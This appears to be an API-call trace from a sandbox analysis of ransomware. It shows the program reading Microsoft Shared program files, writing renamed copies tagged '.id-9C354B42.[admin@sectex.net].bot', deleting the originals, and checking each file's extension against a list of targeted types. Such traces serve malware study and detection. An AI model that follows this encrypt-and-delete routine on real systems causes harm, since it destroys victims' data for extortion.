	[0053.854] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.854] GetLastError () returned 0x0
	[0053.854] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x49f80, lpOverlapped=0x0) returned 1
	[0053.862] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x49f90, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x49f90, lpOverlapped=0x0) returned 1
	[0053.867] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.867] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0053.867] SetEndOfFile (hFile=0x170) returned 1
	[0053.867] CloseHandle (hObject=0x170) returned 1
	[0053.867] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.867] SetEndOfFile (hFile=0x22c) returned 1
	[0053.870] CloseHandle (hObject=0x22c) returned 1
	[0053.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.871] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 1
	[0053.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.871] lstrlenW (lpString=".doc") returned 4
	[0053.871] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.871] lstrlenW (lpString=".docx") returned 5
	[0053.871] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.871] lstrlenW (lpString=".pdf") returned 4
	[0053.871] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.871] lstrlenW (lpString=".xls") returned 4
	[0053.871] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.871] lstrlenW (lpString=".xlsx") returned 5
	[0053.871] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.871] lstrlenW (lpString=".ppt") returned 4
	[0053.871] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.871] lstrlenW (lpString=".zip") returned 4
	[0053.871] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.871] lstrlenW (lpString=".rar") returned 4
	[0053.871] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.871] lstrlenW (lpString=".bz2") returned 4
	[0053.871] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.871] lstrlenW (lpString=".7z") returned 3
	[0053.871] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString=".dbf") returned 4
	[0053.872] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString=".1cd") returned 4
	[0053.872] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString=".jpg") returned 4
	[0053.872] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString=".doc") returned 4
	[0053.872] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.872] lstrlenW (lpString=".docx") returned 5
	[0053.872] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.872] lstrlenW (lpString=".pdf") returned 4
	[0053.872] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.872] lstrlenW (lpString=".xls") returned 4
	[0053.872] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.872] lstrlenW (lpString=".xlsx") returned 5
	[0053.872] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.872] lstrlenW (lpString=".ppt") returned 4
	[0053.872] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString=".zip") returned 4
	[0053.872] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.872] lstrlenW (lpString=".rar") returned 4
	[0053.872] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.872] lstrlenW (lpString=".bz2") returned 4
	[0053.872] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.872] lstrlenW (lpString=".7z") returned 3
	[0053.872] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.872] lstrlenW (lpString=".dbf") returned 4
	[0053.872] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.872] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.873] lstrlenW (lpString=".1cd") returned 4
	[0053.873] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.873] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64
	[0053.873] lstrlenW (lpString=".jpg") returned 4
	[0053.873] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.873] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0053.873] lstrlenW (lpString="WPGIMP32.FLT") returned 12
	[0053.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.874] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=280448) returned 1
	[0053.874] CloseHandle (hObject=0x170) returned 1
	[0053.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 0x20
	[0053.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.874] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.874] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0053.878] GetLastError () returned 0x0
	[0053.878] ReadFile (in: hFile=0x170, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x44780, lpOverlapped=0x0) returned 1
	[0053.884] WriteFile (in: hFile=0x228, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x44790, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x44790, lpOverlapped=0x0) returned 1
	[0053.889] ReadFile (in: hFile=0x170, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.889] WriteFile (in: hFile=0x228, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.889] SetEndOfFile (hFile=0x228) returned 1
	[0053.889] CloseHandle (hObject=0x228) returned 1
	[0053.889] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.889] SetEndOfFile (hFile=0x170) returned 1
	[0053.892] CloseHandle (hObject=0x170) returned 1
	[0053.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.893] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 1
	[0053.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.893] lstrlenW (lpString=".doc") returned 4
	[0053.893] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.893] lstrlenW (lpString=".docx") returned 5
	[0053.893] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.893] lstrlenW (lpString=".pdf") returned 4
	[0053.893] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.893] lstrlenW (lpString=".xls") returned 4
	[0053.893] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.893] lstrlenW (lpString=".xlsx") returned 5
	[0053.893] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.893] lstrlenW (lpString=".ppt") returned 4
	[0053.893] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.893] lstrlenW (lpString=".zip") returned 4
	[0053.893] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.893] lstrlenW (lpString=".rar") returned 4
	[0053.893] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.893] lstrlenW (lpString=".bz2") returned 4
	[0053.893] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.893] lstrlenW (lpString=".7z") returned 3
	[0053.893] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.893] lstrlenW (lpString=".dbf") returned 4
	[0053.893] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.893] lstrlenW (lpString=".1cd") returned 4
	[0053.893] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString=".jpg") returned 4
	[0053.894] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString=".doc") returned 4
	[0053.894] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.894] lstrlenW (lpString=".docx") returned 5
	[0053.894] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.894] lstrlenW (lpString=".pdf") returned 4
	[0053.894] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.894] lstrlenW (lpString=".xls") returned 4
	[0053.894] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.894] lstrlenW (lpString=".xlsx") returned 5
	[0053.894] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.894] lstrlenW (lpString=".ppt") returned 4
	[0053.894] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString=".zip") returned 4
	[0053.894] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.894] lstrlenW (lpString=".rar") returned 4
	[0053.894] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.894] lstrlenW (lpString=".bz2") returned 4
	[0053.894] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.894] lstrlenW (lpString=".7z") returned 3
	[0053.894] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString=".dbf") returned 4
	[0053.894] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString=".1cd") returned 4
	[0053.894] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67
	[0053.894] lstrlenW (lpString=".jpg") returned 4
	[0053.894] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.895] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0053.895] lstrlenW (lpString="hxds.dll") returned 8
	[0053.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.284] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=1257984) returned 1
	[0055.284] CloseHandle (hObject=0x230) returned 1
	[0055.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 0x20
	[0055.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.285] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.285] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.285] GetLastError () returned 0x0
	[0055.285] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0055.306] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0055.324] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x33210, lpOverlapped=0x0) returned 1
	[0056.060] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x33220, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x33220, lpOverlapped=0x0) returned 1
	[0056.066] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.066] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0056.066] SetEndOfFile (hFile=0x21c) returned 1
	[0056.066] CloseHandle (hObject=0x21c) returned 1
	[0056.067] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.067] SetEndOfFile (hFile=0x230) returned 1
	[0056.069] CloseHandle (hObject=0x230) returned 1
	[0056.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.069] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 1
	[0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.069] lstrlenW (lpString=".doc") returned 4
	[0056.069] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0056.069] lstrlenW (lpString=".docx") returned 5
	[0056.069] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1
	[0056.069] lstrlenW (lpString=".pdf") returned 4
	[0056.069] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0056.069] lstrlenW (lpString=".xls") returned 4
	[0056.070] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString=".xlsx") returned 5
	[0056.070] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1
	[0056.070] lstrlenW (lpString=".ppt") returned 4
	[0056.070] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.070] lstrlenW (lpString=".zip") returned 4
	[0056.070] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString=".rar") returned 4
	[0056.070] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString=".bz2") returned 4
	[0056.070] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0056.070] lstrlenW (lpString=".7z") returned 3
	[0056.070] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.070] lstrlenW (lpString=".dbf") returned 4
	[0056.070] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.070] lstrlenW (lpString=".1cd") returned 4
	[0056.070] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.070] lstrlenW (lpString=".jpg") returned 4
	[0056.070] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.070] lstrlenW (lpString=".doc") returned 4
	[0056.070] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString=".docx") returned 5
	[0056.070] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1
	[0056.070] lstrlenW (lpString=".pdf") returned 4
	[0056.070] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0056.070] lstrlenW (lpString=".xls") returned 4
	[0056.070] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0056.071] lstrlenW (lpString=".xlsx") returned 5
	[0056.071] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1
	[0056.071] lstrlenW (lpString=".ppt") returned 4
	[0056.071] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0056.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.071] lstrlenW (lpString=".zip") returned 4
	[0056.071] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0056.071] lstrlenW (lpString=".rar") returned 4
	[0056.071] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0056.071] lstrlenW (lpString=".bz2") returned 4
	[0056.071] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0056.071] lstrlenW (lpString=".7z") returned 3
	[0056.071] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0056.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.071] lstrlenW (lpString=".dbf") returned 4
	[0056.071] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0056.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.071] lstrlenW (lpString=".1cd") returned 4
	[0056.071] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0056.071] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60
	[0056.071] lstrlenW (lpString=".jpg") returned 4
	[0056.071] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0056.071] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0056.071] lstrlenW (lpString="MSOINTL.DLL.IDX_DLL") returned 19
	[0056.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0056.072] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=55680) returned 1
	[0056.072] CloseHandle (hObject=0x230) returned 1
	[0056.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 0x20
	[0056.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0056.072] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
